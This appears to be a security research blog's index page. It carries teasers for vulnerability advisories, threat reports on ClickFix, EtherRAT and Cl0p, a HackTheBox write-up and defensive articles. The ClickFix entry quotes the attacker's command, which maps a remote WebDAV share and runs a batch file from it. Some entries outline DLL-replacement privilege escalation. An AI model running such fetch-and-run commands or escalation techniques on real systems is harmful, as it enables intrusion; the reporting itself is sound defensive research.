New articles!
- Advisories
DLL Hijacking in EfficientLab Controlio (cloud-based employee monitoring service)
- Security Research
Ethical Boundaries of Independent Security Research in the Consumer Pet Tracking Ecosystem
Articles
- Advisories
Broken Access Control in Config Endpoint in LiteLLM
Broken Access Control in Config Endpoint in LiteLLM An incomplete authorization check in LiteLLM allowed low privileged attackers to access sensitive data on the host system. CVE-2026-35029 Read the full advisory here Share this article Dive deeper
- Vulnerabilities
Making Vulnerable Drivers Exploitable Without Hardware - The BYOVD Perspective
Making Vulnerable Drivers Exploitable Without Hardware - The BYOVD Perspective Table of contents 1 Introduction 2 The offensive value of kernel mode drivers 3 Device object creation and maintenance - common patterns 3.1 Unconditional creation upon driver load 3.2 Conditional device creation and maintenance 3.3 PnP-specific callbacks as the main location of PnP driver initialization logic 3.3.1 AddDevice 3.3.2 IRP_MJ_PNP 3.4 Active hardware interaction and probing 3.4.1 Neutral hardware use 3.4.2 Vulnerable hardware use 3.4.3 Hardware gating 4 How driver deployment can be approached from the BYOVD perspective 4.1 Simple sc.exe deployment 4.2 Creating software-emulated devices with spoofed hardware ID 4.2.1 The idea 4.2.2 Initial test results 4.2.3 Creating software-emulated devices with SoftwareDevice and PnpManager 4.2.3.1 SetupAPI and PnpManager - process overview 4.2.3.2 SetupAPI and PnpManager - device node creation only 2.3.3 SetupAPI and PnpManager - complete and successful deployment 4.2.3.4 Software Device API 4.3 Jumping device stacks 4.3.1 Filter restacking 4.3.2 Per-device and per-class filters 4.4 Forced driver replacement 4
- Advisories
Exposed Private Key of X.509 Certificate in SAP HANA Cockpit & SAP HANA Database Explorer
Exposed Private Key of X.509 Certificate in SAP HANA Cockpit & SAP HANA Database Explorer SAP HANA Cockpit users with access to the Database Explorer could retrieve the private keys of X.509 certificates. This could be used to impersonate the application server on network level, allowing an attacker to obtain user credentials or other sensitive data. The software patch provided by SAP does not suffice to completely mitigate the security risk. The affected X.509 certificates and corresponding private keys need to be revoked and rotated manually. CVE-2026-34262 Read the full advisory here Share this article Dive deeper
- Advisories
Improper Enforcement of Locked Accounts in WebUI (SSO) in Kiuwan SAST on-premise (KOP) & cloud/SaaS
Improper Enforcement of Locked Accounts in WebUI (SSO) in Kiuwan SAST on-premise (KOP) & cloud/SaaS Kiuwan SAST did not properly enforce the configuration of locked accounts and allowed a login to the WebUI through SSO authentication, even though the locally mapped Kiuwan account was disabled. CVE-2026-24069 Read the full advisory here Share this article Dive deeper
- Cyber threats
EtherRAT Distribution Spoofing Administrative Tools via GitHub Facades
EtherRAT Distribution Spoofing Administrative Tools via GitHub Facades Introduction A sophisticated, high-resilience malicious campaign was identified by Atos Threat Research Center (TRC) in March 2026. This operation specifically targets the high-privilege professional accounts of enterprise administrators, DevOps engineers and security analysts by impersonating administrative utilities they rely on for daily operations. By integrating Search Engine Order (SEO) poisoning, a dual-stage GitHub distribution architecture and decentralized blockchain based command-and-control (C2) resolving, Threat Actors have established a highly resilient delivery and persistence mechanism. Creative Distribution via GitHub Facades The campaign utilizes a multi-layered delivery chain designed to evade platform level takedowns and maintain a high search engine ranking. The attack begins with SEO poisoning on various search engines, including: Bing, Yahoo, DuckDuckGo and Yandex. That ensures that malicious results for niche IT terms rank at the top of search results. Users are initially directed to a primary "facade" GitHub repository. These repositories are optimized for SEO but contain no malicious code - just professional looking README file. To maintain operational flexibility, the README contains a link directing a victim to a second, hidden GitHub repository. It serves as the true distribution point for the malware. By separating the
- Advisories
Broken Access Control in Open WebUI
Broken Access Control in Open WebUI An incomplete authorization check in Open WebUI allowed low privileged attackers to access sensitive tool data. CVE-2026-34222 Read the full advisory here Share this article Dive deeper
- Cyber threats
Anatomy of access: Windows device objects from a security perspective
Anatomy of access: Windows device objects from a security perspective Table of contents 1 Introduction 2 Device objects as the most viable kernel attack vector 3 Accessing device objects 3.1 Standard pattern 3.2 Accessing device objects via symlinks versus directly 3.3 Desired access zero 3.4 Named vs unnamed devices 3.5 Control devices vs PnP devices 3.6 Device stacks 3.6.1 IRP travel 3.6.2 Inspecting device stacks 3.6.3 Attacking drivers via device stacks 3.6.4 Security descriptors of unnamed device objects 3.6.5 Security descriptors and device stacks 3.6.6 Multiple named devices in a single device stack 3.6.7 Filters as access control 3.7 Multiple device objects equal multiple entry points 3.7.1 Multidevice WDM drivers 3.7.2 Multidevice WDF (KMDF) drivers 3.8 FILE_DEVICE_SECURE_OPEN 4 Bonus - device mapper tool 1. Introduction This article was not initially intended to be published as a standalone piece. It started as an introduction to a different article I am currently working on, but eventually it grew to the point where I decided to make it an article of its own. It provides extensive, up-to-date
- Cyber threats
The Invisible Danger of Exposed QR Codes and Account Recovery Artifacts
The Invisible Danger of Exposed QR Codes and Account Recovery Artifacts Summary Too often second-factor authentication QR codes are treated like harmless pictures. Stored by users as a backups, screenshotted and forgotten, like they possess no risk. And when they leak, attackers can turn multi‑factor protections into single‑factor access. This research examines real incidents and common attack paths (screenshots, cloud backups, duplicate enrollments) and recommends practical mitigations that strengthen device‑bound provisioning without breaking usability. 2FA and it’s cons Although TOTP-based 2FA is widely deployed to mitigate credential theft, its security rests on the assumption that the shared secret provisioned to the user remains confidential. In real-world settings that assumption is fragile. Provisioned QR codes are frequently captured in screenshots, forwarded by email, or retained in cloud backups. When combined with the lack of automated secret rotation and the common inability of systems to detect or block duplicate enrollments, this creates a persistent and exploitable attack surface. Figure 1 Example flow of standard TOTP-based authentication Figure 2 Example flow of standard TOTP-based authenticationThe incidents described clearly show how these weaknesses can be leveraged to bypass MFA and undermine trust in a commonly used
- Advisories
Local Privilege Escalation in Vienna Assistant (MacOS) - Vienna Symphonic Library
Local Privilege Escalation in Vienna Assistant (MacOS) - Vienna Symphonic Library The Vienna Symphonic Library - Vienna Assistant software for MacOS utilizes a privileged helper to perform privileged actions. The NSXPC listener of the privileged helper, does not perform client validation at all leading to privilege escalation. CVE-2026-24068 Read the full advisory here Share this article Dive deeper
- Advisories
Multiple Privilege Escalation Vulnerabilities in Arturia Software Center MacOS
Multiple Privilege Escalation Vulnerabilities in Arturia Software Center MacOS The Arturia Software Center was found to be vulnerable to local privilege escalation via multiple vectors. The privileged helper utilized by Arturia Software Center via XPC does not perform client validation. When installing a plugin a world writeable uninstall shell script will be installed, which is executed by root when uninstalling. The vendor was unresponsive and no patch is available. CVE-2026-24062, CVE-2026-24063 Read the full advisory here Share this article Dive deeper
- Advisories
Multiple vulnerabilities in PEGA Infinity platform
Multiple Vulnerabilities in PEGA Infinity Platform An attacker could distinguish between valid and invalid usernames based on the server's response time which can be used for username enumeration in the PEGA Infinity platform. An weak brute force protection enabled password spraying attacks, in which the same password is tested against many different usernames, potentially granting unauthorized access to user accounts. Additionally, an Insecure Direct Object Reference (IDOR) vulnerability could be used to read image files from other users without setting the option to share the images with others. CVE-2025-62181, CVE-2025-9559 Read the full advisory here Share this article Dive deeper
- Cyber threats
Investigating a new Click-fix variant
Investigating a new Click-fix variant Summary Atos Researchers identified a new variant of popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a “net use” command is used to map a network drive from an external server, after which a “.cmd” batch file hosted on that drive is executed. Script downloads ZIP archive, unpacks it and executes legitimate WorkFlowy application with modified, malicious logic hidden inside “.asar” archive. This acts as a C2 beacon and a dropper for the final malware payload. Attack overview In this version the initial vector of attack is same as in all the other ones, a web page posing as a captcha mechanism – “happyglamperro”. It prompts user to open Run application via “Win+R”, followed by “Ctrl+V” and “Enter” Figure 1 Phishing website 1 Figure 2 Phishing website 2This executes following command:“cmd.exe” /c net use Z: http://94.156.170255/webdav /persistent:no && “Z:\update.cmd” & net use Z: /deleteTypically, at this stage attackers have used PowerShell or mshta to download and execute next stage of the malware. Here instead we can see that “net use
- Cyber threats
Distributed Denial of 2023?
Distributed Denial of 2023? Introduction Geopolitical events often trigger cyberattacks by state-sponsored Advanced Persistent Threat (APT) groups and hacktivist organizations. Hacktivists usually resort to Distributed Denial of Service (DDoS) attacks worldwide. Therefore, it is essential to analyze the European cyber environment to gain insights into the following information: The number of cyberattacks that have been executed, The countries that have been targeted the most, The groups responsible for the majority of these attacks. This summary is based on data due to December 13, 2023 Anonymous Sudan (Storm-1359) campaign against Microsoft In the year 2023, one of the most significant and widely recognized Distributed Denial of Service (DDoS) attacks was orchestrated by the Anonymous Sudan group against the United States. The primary target of the attack was Microsoft, which was attacked multiple times during the campaign that spanned from June to July. The DDoS attacks carried out by Anonymous Sudan in 2023 resulted in significant disruptions and downtime for services, which could lead to financial losses and reputational damage for the affected companies. The attacks targeted several high-profile US companies, including Microsoft, and were carried out using a range of techniques, including HTTP(S) flood attacks, cache bypass, and
- Cyber threats
Domain Spoofing
Domain Spoofing Introduction In the dynamic landscape of cybersecurity, domain spoofing has emerged as an intricate and insidious stratagem employed by threat actors to deceive users and compromise sensitive information. This article endeavors to dissect the profound intricacies surrounding domain spoofing delving into its mechanics, potential consequences, and strategies to mitigate this pervasive threat. Domain spoofing, also known as domain impersonation or domain mimicry, is a deceptive practice where threat actors create fraudulent websites or emails that closely mimic legitimate domains. The primary objective is to exploit the trust users place in familiar domains, such as banking sites, social media platforms or corporate emails systems. Mechanisms of domain spoofing Typosquatting Typosquatting involves the creations of domains that closely resemble popular websites, exploiting the likelihood of users making typographical errors while entering URLs. Threat actors register these deceptive domains with the intention of capitalizing on the traffic generated by users who mistype or misspell web addresses. For instance, if a user mistakenly types “aots.net” instead of “atos.net”, they might be directed to a fraudulent website designed to mimic the appearance of the legitimate site. These imposter websites often employ subtle changes in the domain name, such as swapping letters, adding
- Cyber threats
Writeup Drive Hackthebox
Writeup Drive Hackthebox The aim of this write-up is to explain how to initiate a search process used in a pentest and the various methods used to gain access to the machine, then gain privileges. All commands will be explained in detail, as will the choices made. The first step is to launch the scanning phase. To do this, we'll run an Nmap scan. To begin with, we'll run a simple Nmap scan with the following parameters: -sC: Specifies basic script execution for service information and vulnerability detection. -sV: Determines the versions of services running on open ports. This can help identify specific vulnerabilities associated with specific software versions. -p-: Specifies to test all 65,535 ports to ensure that none are missed. Nmap has identified the opening of 2 ports: SSH and HTTP. Our priority will be to explore the HTTP port first. This decision stems from our assessment of the difficulty of the challenge, which clearly indicates the absence of default identifiers. Furthermore, the use of brute force techniques or automated exploits is not considered the appropriate method in this context. Doodle Drive, present on the HTTP port, is a file-sharing service: We don't
- Vulnerabilities
Analysis of Ivanti 0-days, CVE-2023-46805 and CVE-2024-21887
Analysis of Ivanti 0-days, CVE-2023-46805 & CVE-2024-21887 Introduction On January 10, 2024, the cybersecurity organization Volexity reported the active exploitation of two critical zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN devices. These vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, are believed to have been actively exploited by the threat actors. The details of these vulnerabilities are as follows: CVE-2023-46805: This vulnerability represents an authentication bypass issue within the web interface of the gateways. It allows attackers to gain access to restricted areas by bypassing security CVE-2024-21887: This is a code injection vulnerability that, when exploited, permits attackers to execute arbitrary commands on the affected devices through specially designed requests. The simultaneous exploitation of CVE-2023-46805 and CVE-2024-21887 allows for remote code execution across all supported versions of the Ivanti Connect Secure (ICS) VPN devices. Volexity's investigations revealed that attackers have used this combination of vulnerabilities to exfiltrate configuration data, alter and retrieve files, and establish reverse tunnels from the Ivanti Connect Secure (ICS) VPN appliances. In response, Ivanti has provided interim mitigation steps for users to implement until permanent patches are released, with the
- Cyber threats
From zero to certificate hero. The 5 Steps to a mature Certificate Lifecycle Management
From zero to certificate hero. The 5 Steps to a mature Certificate Lifecycle Management Imagine. Your important website/customer portal/service tools/VPN/… goes down unexpectedly. Everyone is running around stressed to the max. After trying out several things, someone discovers that a certificate has expired. Sounds familiar? You’re not alone. Effective Certificate Lifecycle Management is a process many organizations struggle with. According to the 2023 State of Machine Identity Management Report, 77% of the responding organizations said they had at least two significant outages caused by expired certificates in the past 24 months. 62% Say they don’t know precisely how many certificates they have. Even when they do, renewing certificates is often overlooked, or people who know how to do it have left the organization or moved on to other assignments, so that certificates tend to expire with outages as a result. Such important contingency plans like revoking and replacing certificates, or even having to replace them en masse, are often overlooked. In addition, responsibilities are often unclear or misassigned to teams that do not have real means to exercise the responsibilities given, leading to an exercise in futility and frustration in addition to the outages. To reduce
- Vulnerabilities
Citrix NetScaler flaw exposing sensitive data
Citrix NetScaler flaw exposing sensitive data Introduction On 10th of October 2023 Citrix Systems released a security bulletin for one critical and one high severity vulnerabilities. Critical vulnerability identified as CVE-2023-4966, was discovered in Citrix NetScaler ADC and NetScaler Gateway, categorized as "sensitive information disclosure." This flaw, with a significant CVSS score of 9.4, poses a risk to the security framework of the affected systems. Key Takeaways NetScaler ADC and NetScaler Gateway exhibit a critical vulnerability tied to unauthenticated buffer overflow, identified as CVE-2023-4966. This flaw, causing sensitive information disclosure in certain configurations (Gateway or AAA virtual server), holds a high CVSSv3 score of 9.4, emphasizing its critical nature. A patch addressing this issue is now available, mitigating the risks associated with the unauthenticated buffer overflow. Given the critical severity, this vulnerability is notably concerning as hackers frequently target Citrix products, often deployed within large organizations possessing valuable assets. Recommendations It is recommended to users of NetScaler ADC and NetScaler Gateway to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible. No mitigation methods were provided by the vendor. Technical details Citrix NetScaler ADC and NetScaler Gateway are affected
- Vulnerabilities
Using EDR telemetry for offensive research
Using EDR telemetry for offensive research About EDR EDR – Endpoint Detection and Response – is a type of security solution, with agents running on endpoints (workstations, servers, etc.). Its first role is detection of incidents and threats. The second role is response, not only based on automatic prevention, but also giving Blue Teams the ability to perform various actions on endpoints, like downloading samples, dumping memory, or isolating the host from the network. EDRs have become a game changer in the cybersecurity landscape, with their origin dating back one decade ago. This article explores the notion of using EDR telemetry as a source of knowledge on software behaviors, and how to query that source to find potential security vulnerabilities. Telemetry To monitor systems for threats and malicious activities, EDRs collect relatively broad set of event information, commonly referred to as EDR telemetry. Those events include, but are not limited to, process creation (and termination), file creation/modification/removal, network connections, registry operations, various system events etc. In the rest of the article, I refer to them as base events. The exact list of supported base events, their names, properties, and information they provide varies between vendors. The telemetry from each endpoint is
- Vulnerabilities
Downfall Vulnerability (CVE-2022-40982)
Downfall Vulnerability (CVE-2022-40982) Key Takeaways Downfall Vulnerability Scope: The Downfall vulnerability, tracked as CVE-2022-40982, affects multiple Intel microprocessor families from Skylake through Ice Lake, enabling attackers to steal sensitive data, including passwords, encryption keys, and private user data. Technical Mechanism: The vulnerability exploits the gather instruction in Intel processors, leaking the content of the internal vector register file during speculative execution. Exploitation Techniques: Two primary attack techniques, Gather Data Sampling (GDS) and Gather Value Injection (GVI), have been developed. These techniques can compromise data across user-kernel boundaries, processes, virtual machines, and trusted execution environments. Intel's Response: Intel has been aware of the Downfall/GDS vulnerability and has collaborated on the findings. A microcode update has been released to mitigate the issue, and certain newer Intel processor families are not affected. Recommendations Hardware and Software Updates: Organizations should consider upgrading to CPUs that are not vulnerable to the Downfall attacks and ensure that all software and microcode updates from Intel are promptly applied. Risk Assessment: Evaluate the risk based on Intel's threat assessment and performance analysis. In specific environments, the impact might be minimal, but a thorough assessment is crucial. Implement Software-Based Mitigations: Consider
- Vulnerabilities
Roaming and racing to get SYSTEM – CVE-2023-37250
Roaming and racing to get SYSTEM – CVE-2023-37250 Introduction In my previous blog post (Creating Persistent Local Privilege Escalation with Temporarily Elevated Legitimate Installers) I mentioned potential local privilege escalation issues based on the pattern of highly-privileged processes executing code from files controlled by regular users. One such example that caught my attention was the Windows version of Parsec (150.88.0.0 and earlier) - a remote desktop solution owned by Unity Inc. After deployment, there is a component running as a service with NT AUTHORITY/SYSTEM privileges, created from C:Program FilesParsecparsecd.exe executable (the default installation path). The user-facing component docked in the system tray and providing the interface, is also started from the same executable - but interactively, by regular users. So, whenever a regular user wants to use Parsec, they create their own instance of parsecd.exe with their own privileges and Medium integrity, while another instance of parsecd.exe is already running as a service with SYSTEM integrity. In the affected version, upon user initialization, both instances load a DLL file named parsecd-150-87d.dll, located in the %APPDATA%RoamingParsec directory of the regular user who initiated the process (e.g. C:UsersjohnAppDataRoamingParsec
- Incident response
Outlaw APT group - From initial access to crypto mining
Outlaw APT group - From initial access to crypto mining Foreword Eviden Digital Security regularly performs incident response and gathers information on various groups of attackers. In the summer 2022, a company discovered one of their machines was performing SSH brute-force attempts and scanning ports on external targets. The company contacted Eviden Digital Security to manage the crisis and remediate the incident. Eviden Incident Response Team gathered information about malicious activities on the victim’s machine, which revealed one of the company’s servers had been used to mine Monero with the XMRig cryptominer. Eviden Incident Response Team attributed the attacks to the Outlaw threat actor with a high level of confidence. Attribution was performed by linking information from Eviden public and private sources to the Indicators of Compromise (IoCs) as well as to the Tactics, Techniques and Procedures (TTPs) observed on the machine. This article describes the results of the investigations conducted on this group, its modus operandi and attacks campaigns. Threat overview The Outlaw threat group is a cryptocurrency mining threat actor that has first been discovered by TrendMicro Researchers in November 2018 . The group is believed to originate in Romania, based on the language, tools and infrastructure it
- Cyber threats
Insider Threat – What if the Big Bad Wolf was already in?
Insider Threat – What if the Big Bad Wolf was already in? Insider threat is considered as one of the top-10 concerns in cyberspace in 2023. It is as prominent cause of concern than external attacks. According to the Ponemon Institute, insider threat incidents have risen 44% over the past two years. The costs per incident have also gone up more than a third to US$15.38 million. Even worse, over 70% of insider attacks are not publicly reported and thus we may not have a clear picture of how many of them occur and what damage they cause. Insiders as a threat Cyberattacks are initiated and carried out by human beings. Technology is only a tool in their hands. With insiders are several actors meant. It refers to employees, organization members, and those to whom the organization has given sensitive information and access. But also, to contractors, vendors, custodians, or repair persons. Basically, anyone that the organization has given access to sensitive information is considered as an insider. The phenomenon of insider threat is twofold. The insiders are considered as both non-hostile threat agents (i.e. distracted employees) as well as hostile ones (i.e. disgruntled employees). The
- Cyber threats
CA/Browser Forum S/MIME Certificate Requirements, what is it and what to do about it?
CA/Browser Forum S/MIME Certificate Requirements: what is it and what to do about it? Introduction Protecting email is an often overlooked but sometimes necessary feature. Email can be encrypted to prevent anyone but the recipient reading it and signed to prevent people altering or forging the content. S/MIME certificates are the way to sign and encrypt email. The new CA/Browser Forum Requirements A key standards body when it comes to public certificates is the CA/Browser forum, which consists of over 50 of the Public CA and over 10 Consumer members, the latter including among others the four leading Browser suppliers: Apple, Google, Microsoft, and Mozilla. This forum produces requirements for certificates as well as public CAs and sometimes validation of certificates that have a global adoption. On January 1st, 2023, the forum produced a new Baseline Requirements for the Issuance and Management of Publicly‐Trusted S/MIME Certificates. The requirements will become effective September 1st 2023 and apply to certificates issued by Public PKIs issued after that date. This is the first set of requirements for this type of certificates written by the CA/Browser Forum. The most important elements in the requirements are the following
- Vulnerabilities
Detailed analysis of the Zero- Day vulnerability in MOVEit transfer
Detailed analysis of the Zero- Day vulnerability in MOVEit transfer Key Takeaways A common feature among all exploited devices is a webshell named 'human2.aspx' located in the 'C:MOVEitTransferwwwroot' public HTML folder. Multiple IP addresses have been associated with the attacks, and the attacks reportedly started on May 27th. The exploitation method strongly resembles the mass exploitations of GoAnywhere MFT and Accellion FTA servers in January 2023 and December 2020 respectively. These previous incidents were linked to the Clop ransomware gang, who exploited managed file transfer platforms for data theft and extortion. The threat actor Lace Tempest has been officially linked to the exploitation of a critical flaw in Progress Software's MOVEit Transfer application. Their apparent collaboration with the cl0p ransomware group, as evidenced by ransom notes found on compromised hosts, reinforces the urgent need for users to promptly apply security patches. The PoC exploit code for MOVEit Transfer was released by Horizon3 company. On June 15th, a third vulnerability (CVE-2023-35708) in Progress Software's MOVEit Transfer was found. This vulnerability could allow users to gain elevated rights and potentially unapproved access to the environment. The vulnerability's specific characteristics that enable worming are unknown. In addition
- Cyber threats
Snake Malware
Snake Malware Taken down by the FBI after 20 years of existence Key Takeaways In a coordinated operation FBI with other organizations took down the Snake malware operational infrastructure. Snake malware has been linked with the Russian Center 16 of FSB and being used for almost 20 years. It has been used in various targeted operations to collect and extract valuable data and information from government and NATO organizations. Introduction Snake is a malware that was originally developed by the FSB (Federal Security Service of the Russian Federation) in late 2003 under the name “Uroburos”. The development ends in early 2004 and moments later it starts conducting cyber operations. Snake has been one of the major tools used by Center 16 of the FSB. It has been in use for almost 20 years and FSB conducted a vast amount of operations with it. Snake is also a part of the Turla family toolset which is used by Russia. Its usage has been detected in 50 countries around the globe since being in operational use. Countries targeted are from both North and South America, Europe, Africa, Asia, and Australia. Snake operators do not target specific industries but it is worth mentioning
- Incident response
BumbleBee hunting with a Velociraptor
BumbleBee hunting with a Velociraptor BumbleBee, a malware which is mainly abused by threat actors in data exfiltration and ransomware incidents, was recently analyzed by Angelo Violetti of SEC Defence - the Digital Forensics and Incident Response team of SEC Consult, an Eviden business. During his research, he used several tools and techniques to define ways to detect the presence of BumbleBee on a compromised infrastructure. The various detection opportunities described in the report can be useful for organizations to detect an infection in its first stages and, therefore, prevent further malicious activity starting from BumbleBee. The detection opportunities rely on open-source tools (e.g., Velociraptor) and rules (e.g., Yara, Sigma) so they can be used by any company or the wider community. Introduction Ransomware attacks, combined with data exfiltration, are one of the most relevant cyber threats for companies worldwide, as reported by the Enisa Threat Landscape 2022. According to the NIST's Incident Handling guide, the prevention and detection phases of those types of attacks can be crucial to minimize the potential incident's impacts (e.g., operational, legal, etc.). To gain initial access into a victim’s infrastructure, ransomware operators abuse mostly the following techniques: Phishing campaigns
- Cyber threats
Cl0p Ransomware Group activity related to data leaks from GoAnywhere MFT
Cl0p Ransomware Group activity related to data leaks from GoAnywhere MFT The essentials The Threat Actor TA505 is deemed as a trendsetter for its ever-changing tactics, techniques, and procedures (TTPs) It targets numerous countries, but it omits close allies of Russia. Is known to use quadruple extortion techniques – including targeting executives and contacting customers to add pressure to pay the ransom Latest campaign saw at least 132 companies breached in some way, with 12 already having their data exposed on the darknet Recommendations Create detection rules based on the groups’ TTPs and IoCs Block the infrastructure (C2s, domains, hashes) of the operators. Ensure you keep regular backups stored on a remote server Make sure system services are kept up to date with patches Regarding GoAnywhere MFT service: Review all administrator users for attacker accounts Update to version 7.1.2 or higher Alternatively apply mitigation configuration - details Introduction Clop is an example of ransomware as a service (RaaS) that is operated by a Russian-speaking group. It was discovered in 2019 after being used by TA505 in a spear phishing campaign. Clop (or Cl0p) is one of the most prolific ransomware families in recent years. It’s infamous for compromising
- Vulnerabilities
Creating persistent local privilege escalation with temporarily elevated legitimate installers
Creating persistent local privilege escalation with temporarily elevated legitimate installers The interesting case of WinSCP A couple of months ago, while analyzing one of our environments, we had noticed instances of the LogonUI.exe process - running as NT AUTHORITY/SYSTEM - loading a DLL file named DragExt64.dll from local user %LOCALAPPDATA%ProgramsWinSCP directories, e.g., C:UsersbobAppDataLocalProgramsWinSCPDragExt64.dll. Since such DLL files are owned by the user (ownership by default inherited from the directory), but executed as SYSTEM, it was clear that this phenomenon created a potential vector for local privilege escalation, as simple as replacing the original DLL with a custom one, containing arbitrary code. Following up, it turned out that DragExt64.dll is an extension of WinSCP responsible for drag & drop support, distributed along with WinSCP. Further investigation revealed that in some systems that file could be found at C:Program Files (x86)WinSCPDragExt64.dll, while in other systems the location was the local user %LOCALAPPDATA%ProgramsWinSCP folder – suggesting that the difference came from whether the user, during installation, chose “Install for all users (recommended)” or “Install for me only”, as demonstrated in the screenshot below:The default and recommended option deploys WinSCP into C:Program Files (x86)WinSCP
- Incident response
SOCCRATES – Automation and Orchestration of Security Operations
SOCCRATES – Automation and Orchestration of Security Operations Automation and Orchestration of Security OperationsSOCCRATES (SOC & CSIRT Response to Attacks & Threats) is a EU-funded research and innovation project that brings together some of the best European expertise in the field to develop, implement and evaluate an automated security platform to support SOC analysts. Atos is a leading provider of Managed Detection & Response (MDR) services. Atos MDR offering is platform driven with AIsaac which is our AI platform for Cyber Analytics and Hybrid SecOps. We constantly collaborate for innovations in MDR. SOCCRATES is an initiative in this direction. This article will focus on the SOCCRATES Orchestrator and Integration Engine which is at the core of the SOCCRATES platform providing automation and orchestration of security operations to response on the different use cases covered by the project. As it was introduced in previous articles, there are many challenges that Security Operation Centres (SOCs), Computer Security Incident Response Teams (CSIRTs) and Managed Security Service Providers (MSSPs) must face to offer an efficient and quick answer to the increasing, evolving and more and more complex number of cyber-attacks the organizations are suffering. One of these challenges is to provide support to the
- Cyber threats
Are privacy-enhancing technologies the holy grail to privacy?
Are privacy-enhancing technologies the holy grail to privacy? The PET’s promise to unlock collaborative analysis in a secure way, even on regulated or sensitive data According to Gartner, by 2025, 60% of large organizations will use one or more privacy-enhancing computation techniques in analytics, business intelligence or cloud computing. PET (Privacy-enhancing technologies) are on the rise. Let’s see why you should have a look at those technologies! PET are bringing the lacking piece to fully comply with data sovereignty regulations There is a growing pressure of regulations around Personal Identifiable Information (PII) protection and data sovereignty (e.g. cross border data transfers to Cloud operators), with the difficult exercise for authorities to balance between latitudes to exploit personal data (social, economic benefits) and re-identification risk, or to enable economic benefits from Cloud while ensuring data sovereignty or IP protection. This is where PET bring their innovation. From the data sovereignty perspective, the emerging set of privacy-enhancing techniques shift the paradigm. While data encryption at rest or in transit were already efficiently addressed through existing encryption technologies, data protection in use (data-in-use) was the lacking piece in the triptych, meaning that data needed
- Incident response
How to build an agile SOC?
How to build an agile SOC? Companies are spending more than ever to protect their digital assets. Gartner predicts that worldwide spending on information security and risk management products and services will hit $188.3 billion in 2023 — and is projected to reach $260 billion by 2026. Yet, cybersecurity incidents continue to grow. The global cost of cybercrime is increasing by 15% year-over-year and is expected to reach $10.5 trillion by 2025.Last year alone, 4,100 publicly disclosed breaches occurred, exposing 22 billion records and data from tens of millions of people. Simply spending more on security is not enough to stop attacks. This article will explore why accelerating your detection and response capabilities is the key to stopping incidents before they cause harm. Asymmetry in cybersecurity Cyber security fundamentally is an asymmetric problem where the defense needs manifold resources compared to an attacker. It's a common adage that while the defender has to protect thousands of weaknesses, an attacker needs to find just one and exploit it. To solve this problem, the dominant paradigm from the last decade was layered security, where more and more security products were installed to create a "defense-in-depth
- Incident response
AI-based detections in SOC
AI-based detections in SOC We are currently experiencing the 4th Industrial Revolution (4IR). If adoption of digital technology was the defining feature of the 3rd Industrial Revolution, then interconnection between these technologies as well between technologies and humans is one of the defining factors of the 4th Industrial Revolution. 4IR has us witnessing technology advancement at an unprecedented pace, blurring the lines between the digital and physical worlds – so much so that it has been termed as the ‘imagination age’. However, at least as far as cyber security is concerned, this is a double-edged sword as these very advancements also help cyber threat actors. Cyber-attacks are evolving at a rapid pace and threat actors have started focusing on Internet of Things (IoT) and Operational technology (OT) in addition to targeting traditional IT infrastructure. So, how does one protect themselves from these evolving threats? The answer lies in a blend of experienced analysts and threat detections driven by Artificial Intelligence (AI). There’s a lot of talk about usage of AI. But the million-dollar question that everyone is asking is – does AI really help in improving my cybersecurity detections? However, before we start talking about whether AI can
- Vulnerabilities
Attacking local self-protection mechanisms – a case study of CVE-2019-3613 and CVE-2022-3859
Attacking local self-protection mechanisms – a case study of CVE-2019-3613 and CVE-2022-3859 Introduction to Trellix CVE 2022-3859 On 29th November Trellix (former McAfee) released a security bulletin addressing an issue tracked as CVE-2022-3859 (https://kcm.trellix.com/corporate/index?page=content&id=SB10391), which I discovered and responsibly disclosed a couple of months before. Its discovery was prompted by my earlier finding of the same nature, affecting the same product, 3 years earlier (CVE-2019-3613, https://kcm.trellix.com/corporate/index?page=content&id=SB10320). Since the official descriptions are rather general and cryptic, while both issues have been addressed, I thought that sharing some of the technical details could be valuable for other techies who are interested in things like security solutions, system programming or sample ideas on attacking software self-protection mechanisms. Self-protection mechanisms As early detection of malicious activity is critical at stopping incidents at their early stage, enterprise security solutions such as Anti-Virus agents and EDR sensors have been, for some time already, equipped with additional self-protection mechanisms. Those mechanisms are built on top of the security controls already provided by the operating system, trying to
- Incident response
CISO’s perspectives - The 4 recommendations to sleep without a worry
CISO’s perspectives - The 4 recommendations to sleep without a worry 1. Sleeping-well CISO: myth or reality? Considering the countless cyber threats that go on, what threat keeps you up at night? This is THE one-billion-dollar question for CISOs today! People suppose we do not sleep well at night because of all the cybersecurity threats around us that target our business. Certainly it’s true that in the past three years there has been a massive increase in terms of attacks against all types of organizations. Additionally in the IT sector we are being highly targeted because we are supplying products and services to customers. Although I sleep much better than a couple of years ago. We now have consolidated our security and have years of experience protecting ourselves and our customers. Nevertheless, I must admit that what can wake me up at night is the “unknown”. Especially the unknown unknowns, as well described by Donald Rumsfeld. In cybersecurity there are threats that we know we know, and we protect against these threats (with mitigated success sometimes). Also, elements that we know we don’t know: for example, servers that didn’t go through the standard registration process
- Cyber threats
10 security tips to protect your organizations against ransomware
10 security tips to protect your organizations against ransomware The business of Ransomware is flourishing, boosted by anonymity of the attackers, limited number of criminal cases being prosecuted, automation of attack methods and huge profit for low risk. The groups behind the ransomware are more and more powerful and operate like a professional enterprise company. They are regrouping their forces - knowledge sharing, techniques - with a direct effect of extending the number of their targets and victims. All companies should consider this threat as one of the most immediate and serious their organizations are facing. Understanding the ransomware threat Common patterns can be recognized in the ransomware attacks. In many cases, the visible part of the attacks is when an encrypting program is executed making the file systems of the workstations and servers unreadable. This stage is the last and visible one. In many cases the networks have been compromised for days, weeks or months before. Standard antivirus software is not efficient against customized malware and let networks and computers be compromised by phishing or exploiting unpatched software vulnerabilities - even both in some cases. A ransomware attack usually has 3 stages: 1. The intrusion Once hackers have entered the
Subscribe to Cyber shield blogs to stay one step ahead of evolving threats
Receive expert‑curated threat intelligence discoveries, technical breakdowns, and proactive defense insights directly from the Atos Threat Research Center(TRC).
